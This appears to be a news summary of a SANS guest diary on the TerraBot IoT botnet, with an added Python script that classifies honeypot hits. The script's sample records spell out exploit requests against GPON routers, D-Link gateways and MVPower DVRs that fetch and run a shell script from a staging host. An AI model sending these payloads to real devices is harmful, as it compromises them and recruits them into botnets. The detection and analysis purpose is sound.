TerraBot IoT Botnet Analysis Reveals Automation Failures and Persistent Scanning
A SANS ISC guest diary dissects the TerraBot IoT botnet, revealing how automated cybercrime campaigns succeed through volume despite technical flaws.

A SANS Internet Storm Center guest diary by Nicole Phillips, an ISC intern in the SANS.edu BACS program, provides a detailed analysis of automated cybercrime noise observed through a DShield honeypot. The report focuses on the TerraBot IoT botnet, a variant derived from Mirai and Gafgyt source code, which scans the internet for vulnerable IoT devices to build a network of compromised systems. Between May 28 and June 9, the honeypot recorded 24 hits from 24 unique IPs using the User-Agent string 'terrabot-owned-you', almost all of them aimed at a small set of well-known router and DVR exploit endpoints rather than at anything specific to the honeypot.
The analysis reveals that 17 of the 24 hits targeted the /GponForm/diag_Form?images/ endpoint, while 6 hits delivered a payload exploiting CVE-2016-20017, an unauthenticated command injection vulnerability affecting legacy D-Link DSL gateway routers. That payload pointed at a staging server at hxxp://140[.]233.190.47 for its second stage. However, the diary highlights significant automation failures in TerraBot's operations. The first hit in the logs was a POST request to /GponForm/diag_Form?images/ attempting to exploit CVE-2018-10561, an authentication bypass flaw in Dasan GPON routers: the ?images/ suffix is what defeats authentication, but the command to be injected has to travel in the POST body, and that body was empty, so the bypass fired with nothing to execute.
Further analysis of a June 9 event targeting CVE-2016-20016, a well-known unauthenticated remote code execution backdoor in legacy MVPower CCTV DVRs, revealed a formatting bug. The script author inserted an unencoded raw space character after 'wget+' instead of the '+' or %20 encoding used elsewhere in the request. An HTTP request line is method, target and version separated by single spaces, so the stray space splits the target in two and turns the line into a malformed request that a conforming web server rejects before the command ever reaches the DVR's shell handler. As written, that request could not have compromised any target.
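The two failure modes above, an empty POST body behind the GPON bypass and a raw space that breaks the request line, are both visible in the raw request before any payload is examined. The following is an added example for this write-up (not code from the ISC diary or from the DShield project) that parses request lines the way an HTTP server does, classifies TerraBot hits by the endpoint they target, flags hits that could not have worked, and extracts defanged staging URLs. The log records are constructed, not real honeypot data; the /login.cgi?cli= and /shell? paths are assumed here as the well-known exploit endpoints for CVE-2016-20017 and CVE-2016-20016 (the diary excerpt above names only the GPON path), and the staging host is an RFC 5737 documentation address, not the one in the diary.

```python
"""Classify TerraBot-style hits from raw HTTP request lines.

Added example, not code from the ISC diary or the DShield project.
Records below are constructed. Paths for CVE-2016-20017 (/login.cgi?cli=)
and CVE-2016-20016 (/shell?) are assumed from the well-known exploits;
the staging host is an RFC 5737 documentation address.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit, unquote_plus

TERRABOT_UA = "terrabot-owned-you"
STAGING = "http://192.0.2.10"  # constructed; RFC 5737 TEST-NET-1, not the diary's IP
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?/[^\s;'\"&`]*")


@dataclass
class Hit:
    request_line: str   # "METHOD target HTTP/x.y" exactly as received on the wire
    user_agent: str
    body: str = ""


@dataclass
class Verdict:
    botnet: bool
    well_formed: bool = True   # request-line was exactly method SP target SP version
    cve: str = ""
    notes: list = field(default_factory=list)
    staging_urls: list = field(default_factory=list)


def parse_request_line(line):
    """RFC 9112: request-line = method SP request-target SP HTTP-version.
    A raw space inside the target yields a 4th token; a conforming server
    answers 400 and never sees the command. That is the 'wget+ ' bug."""
    parts = line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    return tuple(parts)


def defang(url):
    """Render a URL so it cannot be clicked or auto-fetched from a report."""
    u = urlsplit(url)
    return f"{u.scheme.replace('http', 'hxxp')}://{u.netloc.replace('.', '[.]')}{u.path}"


def classify(hit):
    v = Verdict(botnet=(hit.user_agent == TERRABOT_UA))
    parsed = parse_request_line(hit.request_line)
    if parsed is None:
        v.well_formed = False
        v.notes.append("malformed request-line: raw space in target, server would answer 400")
        parts = hit.request_line.split(" ", 2)
        method, target = (parts + ["", ""])[:2]   # what a server would see as the target
    else:
        method, target, _ = parsed
    url = urlsplit(target)
    if url.path.startswith("/GponForm/diag_Form") and url.query.startswith("images/"):
        v.cve = "CVE-2018-10561"   # ?images/ is the auth bypass; the command rides in the body
        if method == "POST" and not hit.body.strip():
            v.notes.append("empty POST body: bypass fired but nothing to inject")
    elif url.path == "/login.cgi" and "cli=" in url.query:
        v.cve = "CVE-2016-20017"   # assumed endpoint for the D-Link DSL command injection
    elif url.path == "/shell":
        v.cve = "CVE-2016-20016"   # assumed endpoint for the MVPower DVR backdoor
    # Look for staging URLs wherever the command landed: the decoded query, the
    # body and, for a broken line, the tail the server would have thrown away.
    haystack = [unquote_plus(url.query), hit.body]
    if not v.well_formed:
        haystack.append(hit.request_line)
    v.staging_urls = [defang(u) for u in URL_RE.findall(" ".join(haystack))]
    return v


def summarize(hits):
    """Tally TerraBot hits by CVE and count the ones that could not have worked."""
    tally = {"total": 0, "by_cve": {}, "dead_on_arrival": 0}
    for hit in hits:
        v = classify(hit)
        if not v.botnet:
            continue
        tally["total"] += 1
        key = v.cve or "unknown"
        tally["by_cve"][key] = tally["by_cve"].get(key, 0) + 1
        if v.notes:
            tally["dead_on_arrival"] += 1
    return tally


SAMPLE_HITS = [   # constructed records, shaped like the cases the diary describes
    # GPON auth bypass with nothing to inject: the empty-body case
    Hit("POST /GponForm/diag_Form?images/ HTTP/1.1", TERRABOT_UA, ""),
    # GPON bypass with a command in dest_host: what a working hit looks like
    Hit("POST /GponForm/diag_Form?images/ HTTP/1.1", TERRABOT_UA,
        f"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget {STAGING}/g.sh -O /tmp/g`&ipv=0"),
    # D-Link DSL gateway command injection via the cli parameter, properly encoded
    Hit(f"GET /login.cgi?cli=aa%20aa%27;wget%20{STAGING}/d%20-O%20/tmp/d;sh%20/tmp/d%27 HTTP/1.1", TERRABOT_UA),
    # MVPower DVR: raw space after 'wget+' splits the request-line into four tokens
    Hit(f"GET /shell?cd+/tmp;rm+-rf+*;wget+ {STAGING}/m.arm;chmod+777+m.arm;sh+m.arm HTTP/1.1", TERRABOT_UA),
    # ordinary scanner noise, not TerraBot
    Hit("GET / HTTP/1.1", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for hit in SAMPLE_HITS:
        print(classify(hit))
    print(summarize(SAMPLE_HITS))
```

Run against the constructed records, the GPON hit with an empty body and the DVR hit with the stray space both come back with a note explaining why they were dead on arrival, while the two well-formed payloads yield a defanged staging URL that can go straight into a report. Splitting the request line on single spaces, as the server does, is the check that catches the encoding bug; looking only at the decoded query string would hide it.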
Despite these failures, the diary emphasizes that automated botnets like TerraBot succeed through volume and mass scanning. The operators exploit the fact that network defense is often reactive, and they can find and weaponize simple gaps that go unnoticed. The analysis underscores the importance of understanding automated cybercrime noise to recognize anomalies and improve threat detection.
The TerraBot botnet's activity is part of a broader ecosystem of automated cybercrime, where attackers use disposable swarms of compromised devices to conduct mass scanning and exploitation campaigns. The diary concludes that while these operators exhibit technical limitations, their persistence and volume make them a significant threat to internet-facing infrastructure.